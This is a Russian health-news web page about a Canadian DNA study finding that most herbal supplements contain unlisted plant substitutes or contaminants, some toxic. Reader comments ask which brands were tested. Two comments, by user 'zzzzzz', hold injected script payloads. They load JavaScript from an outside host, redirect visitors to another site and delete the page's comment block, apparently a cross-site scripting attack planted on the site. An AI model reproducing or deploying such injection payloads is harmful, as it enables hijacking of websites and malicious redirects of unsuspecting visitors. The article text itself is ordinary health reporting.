Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  БАДы оказались самыми заг...  >>  БАДы оказались самыми загрязненными препаратами
 
Обратная связь
 

БАДы оказались самыми загрязненными препаратами

Размер шрифта
26 декабря 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые пришли к выводу, что большинство растительных препаратов из арсенала альтернативной медицины являются загрязненными.

БАДы оказались самыми загрязненными препаратами

На сегодняшний день не существует общепринятой методики выявления источника происхождения растительного продукта. Конечно, мы можем определить вид растения целиком, однако растительный материал, подвергшийся промышленной обработке, анализировать куда сложнее.

С этой целью, среди прочего, применяются генно-инженерные методики, с помощью которых можно распознавать индивидуальные особенности ДНК разных видов. Именно такая методология легла в основу исследования, проводившегося в университете Гелфа (Канада).

Ученые решили исследовать видовую специфичность растительного материала, из которого состоят биологически активные добавки и препараты альтернативной медицины. Оказалось, что 59% таких препаратов имели в составе растения, не указанные на упаковке. Две трети из них содержали заменители основных ингредиентов (то есть концентрация действующего вещества на деле оказывалась меньше указанной), а треть содержала дополнительные растительные примеси.

Всемирная Организация Здравоохранения убеждена: халатное отношение к составу со стороны производителей растительных препаратов представляет собой угрозу для потребителей. Канадское исследование подтвердило данный факт: среди вышеупомянутых примесей и заменителей ученые обнаружили растения с установленной токсичностью и опасными побочными эффектами. Отдельно стоит отметить потенциально негативное лекарственное взаимодействие, которое чрезвычайно часто отмечается при назначении растительных средств.

Авторы считают, что загрязненный состав растительных препаратов – проблема не только фармакологическая, но и репутационная, потому что такой халтурный подход приводит к снижению доверия со стороны потребителей ко всей продукции такого рода. «Мы считаем, что компании, производящие растительные препараты, должны взять на вооружение современные молекулярно-диагностические технологии, чтобы повысить качество состава выпускаемых препаратов», – говорит доктор Стивен Ньюмастер, глава исследовательской группы. «Обороты в этой отрасли огромны, поэтому едва ли эти производственные затраты станут неподъемными для производителей».

В любом случае, будьте осторожны при употреблении растительных препаратов. Помните: отнюдь не все «натуральное» полезно для здоровья!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

26 декабря 2013 в 13:13

Цитировать   |   Пожаловаться

хотелось бы конкретнее узнать бады каких компаний внушают доверие?

2 - Гость

27 декабря 2013 в 19:12

Цитировать   |   Пожаловаться

что можно сказать про бады вижион?

3 - Гость

06 февраля 2014 в 21:56

Цитировать   |   Пожаловаться

Исследования каких именно производителей проводились?  Одна вода в статье и ни какой конкретики. Присоединясь к вопросу, какие производители используют некачественное и грязное сырье? А использовать таблетки-пустышки, какие продают на отечественном рынке разве лучше?

4 - zzzzzz

30 июня 2015 в 18:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Популярный БАД не помогает вашим коленям   Что такое бактериофаг   Рыжий, рыжий, конопатый... А теперь еще и с раком! Ген рыжих волос приводит к раку кожи! Как защититься   Все что надо знать о бронхите  
14 июня 2013Рыжий, рыжий, конопатый... А теперь еще и с раком! Ген рыжих волос приводит к раку кожи! Как защититься 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Странные сигналы вашего организма
Как снова хотеть секса
Проблемы с внешностью или болезнь?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.